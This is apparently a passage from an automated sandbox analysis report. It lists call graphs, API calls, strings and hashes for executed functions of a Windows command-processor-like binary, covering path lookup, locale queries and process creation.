7ff706eb3278 166 API calls 19163 7ff706ed4820 longjmp 19161->19163 19162->19161 19162->19162 19164 7ff706ed4838 19162->19164 19174 7ff706eb73ab 19162->19174 19163->19164 19165 7ff706eb3278 166 API calls 19164->19165 19166 7ff706ed4844 longjmp 19165->19166 19167 7ff706ed485a 19166->19167 19168 7ff706eb7348 166 API calls 19167->19168 19169 7ff706ed487b 19168->19169 19170 7ff706eb7348 166 API calls 19169->19170 19171 7ff706ed48ad 19170->19171 19172 7ff706eb7348 166 API calls 19171->19172 19173 7ff706eb72ff 19172->19173 19173->19117 19173->19120 19176 7ff706eb7401 19175->19176 19177 7ff706ed485a 19175->19177 19176->19138 19178 7ff706eb7348 168 API calls 19177->19178 19179 7ff706ed487b 19178->19179 19180 7ff706eb7348 168 API calls 19179->19180 19181 7ff706ed48ad 19180->19181 19182 7ff706eb7348 168 API calls 19181->19182 19183 7ff706ed48be 19182->19183 19183->19138 16773 7ff706ec8d80 16774 7ff706ec8da4 16773->16774 16775 7ff706ec8db6 16774->16775 16776 7ff706ec8dbf Sleep 16774->16776 16777 7ff706ec8ddb _amsg_exit 16775->16777 16783 7ff706ec8de7 16775->16783 16776->16774 16777->16783 16778 7ff706ec8e56 _initterm 16780 7ff706ec8e73 _IsNonwritableInCurrentImage 16778->16780 16779 7ff706ec8e3c 16787 7ff706ec37d8 GetCurrentThreadId OpenThread 16780->16787 16783->16778 16783->16779 16783->16780 16820 7ff706ec04f4 16787->16820 16789 7ff706ec3839 HeapSetInformation RegOpenKeyExW 16790 7ff706ece9f8 RegQueryValueExW RegCloseKey 16789->16790 16791 7ff706ec388d 16789->16791 16793 7ff706ecea41 GetThreadLocale 16790->16793 16792 7ff706ec5920 VirtualQuery VirtualQuery 16791->16792 16794 7ff706ec38ab GetConsoleOutputCP GetCPInfo 16792->16794 16807 7ff706ec3919 16793->16807 16794->16793 16795 7ff706ec38f1 memset 16794->16795 16795->16807 16796 7ff706ec4d5c 391 API calls 16796->16807 16797 7ff706ec3948 _setjmp 16797->16807 16798 7ff706eceb27 _setjmp 16798->16807 16799 7ff706ec4c1c 166 API calls 16799->16807 16800 7ff706ed8530 370 API calls 16800->16807 16801 7ff706eb3240 166 API calls 16801->16807 16802 7ff706ec01b8 6 API calls 16802->16807 16803 7ff706ebdf60 481 API calls 16803->16807 16804 7ff706eceb71 _setmode 16804->16807 16805 7ff706ec86f0 182 API calls 16805->16807 16806 7ff706ec0580 12 API calls 16808 7ff706ec398b GetConsoleOutputCP GetCPInfo 16806->16808 16807->16790 16807->16796 16807->16797 16807->16798 16807->16799 16807->16800 16807->16801 16807->16802 16807->16803 16807->16804 16807->16805 16807->16806 16809 7ff706ec58e4 EnterCriticalSection LeaveCriticalSection 16807->16809 16811 7ff706ebbe00 647 API calls 16807->16811 16812 7ff706ec58e4 EnterCriticalSection LeaveCriticalSection 16807->16812 16810 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16808->16810 16809->16807 16810->16807 16811->16807 16813 7ff706ecebbe GetConsoleOutputCP GetCPInfo 16812->16813 16814 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16813->16814 16815 7ff706ecebe6 16814->16815 16816 7ff706ebbe00 647 API calls 16815->16816 16817 7ff706ec0580 12 API calls 16815->16817 16816->16815 16818 7ff706ecebfc GetConsoleOutputCP GetCPInfo 16817->16818 16819 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16818->16819 16819->16807 16821 7ff706ec0504 16820->16821 16822 7ff706ec051e GetModuleHandleW 16821->16822 16823 7ff706ec054d GetProcAddress 16821->16823 16824 7ff706ec056c SetThreadLocale 16821->16824 16822->16821 16823->16821

                                                                                                                                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC0A6C Relevance: 54.9, APIs: 23, Strings: 8, Instructions: 605COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$P<dwj`$PATH$PATHEXT$cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3305344409-2075182244
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9bfec8900945ec7118506fc4e3bb8b18e404af2f69f167a43fa234661bd7550b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14429125A0878285EB64AB219C342BBE7A1FF85BA4FC44234DD1E4B7D5DF3DE5468320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBAA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 216 7ff706ebaa54-7ff706ebaa98 call 7ff706ebcd90 219 7ff706ebaa9e 216->219 220 7ff706ecbf5a-7ff706ecbf70 call 7ff706ec4c1c call 7ff706ebff70 216->220 221 7ff706ebaaa5-7ff706ebaaa8 219->221 223 7ff706ebacde-7ff706ebad00 221->223 224 7ff706ebaaae-7ff706ebaac8 wcschr 221->224 230 7ff706ebad06 223->230 224->223 226 7ff706ebaace-7ff706ebaae9 towlower 224->226 226->223 229 7ff706ebaaef-7ff706ebaaf3 226->229 232 7ff706ebaaf9-7ff706ebaafd 229->232 233 7ff706ecbeb7-7ff706ecbec4 call 7ff706edeaf0 229->233 234 7ff706ebad0d-7ff706ebad1f 230->234 235 7ff706ecbbcf 232->235 236 7ff706ebab03-7ff706ebab07 232->236 243 7ff706ecbf43-7ff706ecbf59 call 7ff706ec4c1c 233->243 244 7ff706ecbec6-7ff706ecbed8 call 7ff706eb3240 233->244 237 7ff706ebad22-7ff706ebad2a call 7ff706ec13e0 234->237 245 7ff706ecbbde 235->245 239 7ff706ebab09-7ff706ebab0d 236->239 240 7ff706ebab7d-7ff706ebab81 236->240 237->221 246 7ff706ecbe63 239->246 248 7ff706ebab13-7ff706ebab17 239->248 240->246 247 7ff706ebab87-7ff706ebab95 240->247 243->220 244->243 261 7ff706ecbeda-7ff706ecbee9 call 7ff706eb3240 244->261 256 7ff706ecbbea-7ff706ecbbec 245->256 259 7ff706ecbe72-7ff706ecbe88 call 7ff706eb3278 call 7ff706ec4c1c 246->259 252 7ff706ebab98-7ff706ebaba0 247->252 248->240 253 7ff706ebab19-7ff706ebab1d 248->253 252->252 257 7ff706ebaba2-7ff706ebabb3 call 7ff706ebcd90 252->257 253->245 258 7ff706ebab23-7ff706ebab27 253->258 266 7ff706ecbbf8-7ff706ecbc01 256->266 257->220 272 7ff706ebabb9-7ff706ebabde call 7ff706ec13e0 call 7ff706ec33a8 257->272 258->256 263 7ff706ebab2d-7ff706ebab31 258->263 281 7ff706ecbe89-7ff706ecbe8c 259->281 276 7ff706ecbef3-7ff706ecbef9 261->276 277 7ff706ecbeeb-7ff706ecbef1 261->277 263->230 268 7ff706ebab37-7ff706ebab3b 263->268 266->234 268->266 269 7ff706ebab41-7ff706ebab45 268->269 273 7ff706ecbc06-7ff706ecbc2a call 7ff706ec13e0 269->273 274 7ff706ebab4b-7ff706ebab4f 269->274 305 7ff706ebac75 272->305 306 7ff706ebabe4-7ff706ebabe7 272->306 298 7ff706ecbc2c-7ff706ecbc4c _wcsnicmp 273->298 299 7ff706ecbc5a-7ff706ecbc61 273->299 279 7ff706ebad2f-7ff706ebad33 274->279 280 7ff706ebab55-7ff706ebab78 call 7ff706ec13e0 274->280 276->243 282 7ff706ecbefb-7ff706ecbf0d call 7ff706eb3240 276->282 277->243 277->276 290 7ff706ecbc66-7ff706ecbc8a call 7ff706ec13e0 279->290 291 7ff706ebad39-7ff706ebad3d 279->291 280->221 286 7ff706ecbe92-7ff706ecbeaa call 7ff706eb3278 call 7ff706ec4c1c 281->286 287 7ff706ebacbe 281->287 282->243 312 7ff706ecbf0f-7ff706ecbf21 call 7ff706eb3240 282->312 340 7ff706ecbeab-7ff706ecbeb6 call 7ff706ec4c1c 286->340 295 7ff706ebacc0-7ff706ebacc7 287->295 319 7ff706ecbcc4-7ff706ecbcdc 290->319 320 7ff706ecbc8c-7ff706ecbcaa _wcsnicmp 290->320 300 7ff706ebad43-7ff706ebad49 291->300 301 7ff706ecbcde-7ff706ecbd02 call 7ff706ec13e0 291->301 295->295 309 7ff706ebacc9-7ff706ebacda 295->309 298->299 313 7ff706ecbc4e-7ff706ecbc55 298->313 307 7ff706ecbd31-7ff706ecbd4f _wcsnicmp 299->307 303 7ff706ebad4f-7ff706ebad68 300->303 304 7ff706ecbd5e-7ff706ecbd65 300->304 329 7ff706ecbd04-7ff706ecbd24 _wcsnicmp 301->329 330 7ff706ecbd2a 301->330 316 7ff706ebad6a 303->316 317 7ff706ebad6d-7ff706ebad70 303->317 304->303 314 7ff706ecbd6b-7ff706ecbd73 304->314 323 7ff706ebac77-7ff706ebac7f 305->323 306->287 318 7ff706ebabed-7ff706ebac0b call 7ff706ebcd90 * 2 306->318 325 7ff706ecbd55 307->325 326 7ff706ecbbc2-7ff706ecbbca 307->326 309->223 312->243 343 7ff706ecbf23-7ff706ecbf35 call 7ff706eb3240 312->343 315 7ff706ecbbb3-7ff706ecbbb7 313->315 331 7ff706ecbd79-7ff706ecbd8b iswxdigit 314->331 332 7ff706ecbe4a-7ff706ecbe5e 314->332 333 7ff706ecbbba-7ff706ecbbbd call 7ff706ec13e0 315->333 316->317 317->237 318->340 358 7ff706ebac11-7ff706ebac14 318->358 319->307 320->319 327 7ff706ecbcac-7ff706ecbcbf 320->327 323->287 335 7ff706ebac81-7ff706ebac85 323->335 325->304 326->221 327->315 329->330 341 7ff706ecbbac 329->341 330->307 331->332 337 7ff706ecbd91-7ff706ecbda3 iswxdigit 331->337 332->333 333->326 342 7ff706ebac88-7ff706ebac8f 335->342 337->332 345 7ff706ecbda9-7ff706ecbdbb iswxdigit 337->345 340->233 341->315 342->342 347 7ff706ebac91-7ff706ebac94 342->347 343->243 355 7ff706ecbf37-7ff706ecbf3e call 7ff706eb3240 343->355 345->332 351 7ff706ecbdc1-7ff706ecbdd7 iswdigit 345->351 347->287 349 7ff706ebac96-7ff706ebacaa wcsrchr 347->349 349->287 354 7ff706ebacac-7ff706ebacb9 call 7ff706ec1300 349->354 356 7ff706ecbddf-7ff706ecbdeb towlower 351->356 357 7ff706ecbdd9-7ff706ecbddd 351->357 354->287 355->243 361 7ff706ecbdee-7ff706ecbe0f iswdigit 356->361 357->361 358->340 362 7ff706ebac1a-7ff706ebac33 memset 358->362 363 7ff706ecbe11-7ff706ecbe15 361->363 364 7ff706ecbe17-7ff706ecbe23 towlower 361->364 362->305 365 7ff706ebac35-7ff706ebac4b wcschr 362->365 366 7ff706ecbe26-7ff706ecbe45 call 7ff706ec13e0 363->366 364->366 365->305 367 7ff706ebac4d-7ff706ebac54 365->367 366->332 368 7ff706ebad72-7ff706ebad91 wcschr 367->368 369 7ff706ebac5a-7ff706ebac6f wcschr 367->369 371 7ff706ebaf03-7ff706ebaf07 368->371 372 7ff706ebad97-7ff706ebadac wcschr 368->372 369->305 369->368 371->305 372->371 373 7ff706ebadb2-7ff706ebadc7 wcschr 372->373 373->371 374 7ff706ebadcd-7ff706ebade2 wcschr 373->374 374->371 375 7ff706ebade8-7ff706ebadfd wcschr 374->375 375->371 376 7ff706ebae03-7ff706ebae18 wcschr 375->376 376->371 377 7ff706ebae1e-7ff706ebae21 376->377 378 7ff706ebae24-7ff706ebae27 377->378 378->371 379 7ff706ebae2d-7ff706ebae40 iswspace 378->379 380 7ff706ebae42-7ff706ebae49 379->380 381 7ff706ebae4b-7ff706ebae5e 379->381 380->378 382 7ff706ebae66-7ff706ebae6d 381->382 382->382 383 7ff706ebae6f-7ff706ebae77 382->383 383->259 384 7ff706ebae7d-7ff706ebae97 call 7ff706ec13e0 383->384 387 7ff706ebae9a-7ff706ebaea4 384->387 388 7ff706ebaea6-7ff706ebaead 387->388 389 7ff706ebaebc-7ff706ebaef8 call 7ff706ec0a6c call 7ff706ebff70 * 2 387->389 388->389 390 7ff706ebaeaf-7ff706ebaeba 388->390 389->323 397 7ff706ebaefe 389->397 390->387 390->389 397->281
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$:$:$:ON$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 972821348-467788257
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d89b8ef5a57032106b00a460d635cd2fedc4392d70b9e8c128c9239153785143
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9622B225A0874386EB24BF259C352BBE691FF55B94FC89135CA0E4B398DF3CA8458770
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC51EC Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 384COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 398 7ff706ec51ec-7ff706ec5248 call 7ff706ec5508 GetLocaleInfoW 401 7ff706ecef32-7ff706ecef3c 398->401 402 7ff706ec524e-7ff706ec5272 GetLocaleInfoW 398->402 405 7ff706ecef3f-7ff706ecef49 401->405 403 7ff706ec5295-7ff706ec52b9 GetLocaleInfoW 402->403 404 7ff706ec5274-7ff706ec527a 402->404 410 7ff706ec52de-7ff706ec5305 GetLocaleInfoW 403->410 411 7ff706ec52bb-7ff706ec52c3 403->411 408 7ff706ec5280-7ff706ec5286 404->408 409 7ff706ec54f7-7ff706ec54f9 404->409 406 7ff706ecef61-7ff706ecef6c 405->406 407 7ff706ecef4b-7ff706ecef52 405->407 414 7ff706ecef75-7ff706ecef78 406->414 407->406 412 7ff706ecef54-7ff706ecef5f 407->412 408->409 413 7ff706ec528c-7ff706ec528f 408->413 409->401 416 7ff706ec5321-7ff706ec5343 GetLocaleInfoW 410->416 417 7ff706ec5307-7ff706ec531b 410->417 411->414 415 7ff706ec52c9-7ff706ec52d7 411->415 412->405 412->406 413->403 420 7ff706ecef99-7ff706ecefa3 414->420 421 7ff706ecef7a-7ff706ecef7d 414->421 415->410 418 7ff706ecefaf-7ff706ecefb9 416->418 419 7ff706ec5349-7ff706ec536e GetLocaleInfoW 416->419 417->416 425 7ff706ecefbc-7ff706ecefc6 418->425 422 7ff706ec5374-7ff706ec5396 GetLocaleInfoW 419->422 423 7ff706eceff2-7ff706eceffc 419->423 420->418 421->410 424 7ff706ecef83-7ff706ecef8d 421->424 427 7ff706ecf035-7ff706ecf03f 422->427 428 7ff706ec539c-7ff706ec53be GetLocaleInfoW 422->428 426 7ff706ecefff-7ff706ecf009 423->426 424->420 429 7ff706ecefde-7ff706ecefe9 425->429 430 7ff706ecefc8-7ff706ecefcf 425->430 431 7ff706ecf021-7ff706ecf02c 426->431 432 7ff706ecf00b-7ff706ecf012 426->432 435 7ff706ecf042-7ff706ecf04c 427->435 433 7ff706ec53c4-7ff706ec53e6 GetLocaleInfoW 428->433 434 7ff706ecf078-7ff706ecf082 428->434 429->423 430->429 436 7ff706ecefd1-7ff706ecefdc 430->436 431->427 432->431 437 7ff706ecf014-7ff706ecf01f 432->437 438 7ff706ecf0bb-7ff706ecf0c5 433->438 439 7ff706ec53ec-7ff706ec540e GetLocaleInfoW 433->439 442 7ff706ecf085-7ff706ecf08f 434->442 440 7ff706ecf064-7ff706ecf06f 435->440 441 7ff706ecf04e-7ff706ecf055 435->441 436->425 436->429 437->426 437->431 443 7ff706ecf0c8-7ff706ecf0d2 438->443 444 7ff706ec5414-7ff706ec5436 GetLocaleInfoW 439->444 445 7ff706ecf0fe-7ff706ecf108 439->445 440->434 441->440 446 7ff706ecf057-7ff706ecf062 441->446 447 7ff706ecf091-7ff706ecf098 442->447 448 7ff706ecf0a7-7ff706ecf0b2 442->448 449 7ff706ecf0d4-7ff706ecf0db 443->449 450 7ff706ecf0ea-7ff706ecf0f5 443->450 451 7ff706ecf141-7ff706ecf14b 444->451 452 7ff706ec543c-7ff706ec545e GetLocaleInfoW 444->452 453 7ff706ecf10b-7ff706ecf115 445->453 446->435 446->440 447->448 454 7ff706ecf09a-7ff706ecf0a5 447->454 448->438 449->450 455 7ff706ecf0dd-7ff706ecf0e8 449->455 450->445 460 7ff706ecf14e-7ff706ecf158 451->460 456 7ff706ecf184-7ff706ecf18b 452->456 457 7ff706ec5464-7ff706ec5486 GetLocaleInfoW 452->457 458 7ff706ecf12d-7ff706ecf138 453->458 459 7ff706ecf117-7ff706ecf11e 453->459 454->442 454->448 455->443 455->450 463 7ff706ecf18e-7ff706ecf198 456->463 464 7ff706ecf1c4-7ff706ecf1ce 457->464 465 7ff706ec548c-7ff706ec54ae GetLocaleInfoW 457->465 458->451 459->458 466 7ff706ecf120-7ff706ecf12b 459->466 461 7ff706ecf170-7ff706ecf17b 460->461 462 7ff706ecf15a-7ff706ecf161 460->462 461->456 462->461 467 7ff706ecf163-7ff706ecf16e 462->467 468 7ff706ecf1b0-7ff706ecf1bb 463->468 469 7ff706ecf19a-7ff706ecf1a1 463->469 472 7ff706ecf1d1-7ff706ecf1db 464->472 470 7ff706ec54b4-7ff706ec54f5 setlocale call 7ff706ec8f80 465->470 471 7ff706ecf207-7ff706ecf20e 465->471 466->453 466->458 467->460 467->461 468->464 469->468 474 7ff706ecf1a3-7ff706ecf1ae 469->474 473 7ff706ecf211-7ff706ecf21b 471->473 476 7ff706ecf1f3-7ff706ecf1fe 472->476 477 7ff706ecf1dd-7ff706ecf1e4 472->477 478 7ff706ecf233-7ff706ecf23e 473->478 479 7ff706ecf21d-7ff706ecf224 473->479 474->463 474->468 476->471 477->476 481 7ff706ecf1e6-7ff706ecf1f1 477->481 479->478 482 7ff706ecf226-7ff706ecf231 479->482 481->472 481->476 482->473 482->478
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$P<dwj`$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1351325837-2976332092
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9c6bd17f64cb01cca8f19400a1c02abcea2e238f350f19ca3a987e6d4c4d2587
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F15B69B0874286EF25AF15ED202BBB6A5BF44B94FD44136CA0D47794EF3CE51AC320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC4224 Relevance: 47.6, APIs: 19, Strings: 8, Instructions: 328threadprocessstringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 483 7ff706ec4224-7ff706ec42a5 InitializeProcThreadAttributeList 484 7ff706ececd4-7ff706ececee GetLastError call 7ff706ed9eec 483->484 485 7ff706ec42ab-7ff706ec42e5 UpdateProcThreadAttribute 483->485 492 7ff706eced1e 484->492 487 7ff706ececf0-7ff706eced19 GetLastError call 7ff706ed9eec DeleteProcThreadAttributeList 485->487 488 7ff706ec42eb-7ff706ec43c6 memset * 2 GetStartupInfoW call 7ff706ec3a90 call 7ff706ebb900 485->488 487->492 497 7ff706ec4638-7ff706ec4644 _local_unwind 488->497 498 7ff706ec43cc-7ff706ec43d3 488->498 499 7ff706ec4649-7ff706ec4650 497->499 498->499 500 7ff706ec43d9-7ff706ec43dc 498->500 499->500 503 7ff706ec4656-7ff706ec465d 499->503 501 7ff706ec4415-7ff706ec4424 call 7ff706ec5a68 500->501 502 7ff706ec43de-7ff706ec43f5 wcsrchr 500->502 510 7ff706ec442a-7ff706ec4486 CreateProcessW 501->510 511 7ff706ec4589-7ff706ec4590 501->511 502->501 504 7ff706ec43f7-7ff706ec440f lstrcmpW 502->504 503->501 506 7ff706ec4663 503->506 504->501 507 7ff706ec4668-7ff706ec466d call 7ff706ed9044 504->507 506->500 507->501 513 7ff706ec448b-7ff706ec448f 510->513 511->510 514 7ff706ec4596-7ff706ec45fa CreateProcessAsUserW 511->514 515 7ff706ec4672-7ff706ec4682 GetLastError 513->515 516 7ff706ec4495-7ff706ec44c7 CloseHandle call 7ff706ec498c 513->516 514->513 518 7ff706ec468d-7ff706ec4694 515->518 516->518 522 7ff706ec44cd-7ff706ec44e5 516->522 520 7ff706ec46a2-7ff706ec46ac 518->520 521 7ff706ec4696-7ff706ec46a0 518->521 523 7ff706ec46ae-7ff706ec46b5 call 7ff706ec97bc 520->523 526 7ff706ec4705-7ff706ec4707 520->526 521->520 521->523 524 7ff706ec47a3-7ff706ec47a9 522->524 525 7ff706ec44eb-7ff706ec44f2 522->525 541 7ff706ec4703 523->541 542 7ff706ec46b7-7ff706ec4701 call 7ff706f0c038 523->542 528 7ff706ec45ff-7ff706ec4607 525->528 529 7ff706ec44f8-7ff706ec4507 525->529 526->522 527 7ff706ec470d-7ff706ec472a call 7ff706ebcd90 526->527 546 7ff706ec473d-7ff706ec4767 call 7ff706ec13e0 call 7ff706ed9eec call 7ff706ebff70 _local_unwind 527->546 547 7ff706ec472c-7ff706ec4738 _local_unwind 527->547 528->529 532 7ff706ec460d 528->532 533 7ff706ec4612-7ff706ec4616 529->533 534 7ff706ec450d-7ff706ec4553 call 7ff706ec5cb4 call 7ff706ec33f0 call 7ff706ec498c 529->534 537 7ff706ec476c-7ff706ec4773 532->537 539 7ff706ec47d7-7ff706ec47df 533->539 540 7ff706ec461c-7ff706ec4633 533->540 564 7ff706ec4558-7ff706ec455e 534->564 537->529 543 7ff706ec4779-7ff706ec4780 537->543 544 7ff706ec47f2-7ff706ec483c call 7ff706ebff70 DeleteProcThreadAttributeList call 7ff706ec8f80 539->544 548 7ff706ec47e1-7ff706ec47ed CloseHandle 539->548 540->544 541->526 542->526 543->529 551 7ff706ec4786-7ff706ec4789 543->551 546->537 547->546 548->544 551->529 556 7ff706ec478f-7ff706ec4792 551->556 556->524 561 7ff706ec4794-7ff706ec479d call 7ff706eda250 556->561 561->524 561->529 567 7ff706ec4564-7ff706ec4579 call 7ff706ec498c 564->567 568 7ff706ec47ae-7ff706ec47ca call 7ff706ec33f0 564->568 567->544 576 7ff706ec457f-7ff706ec4584 call 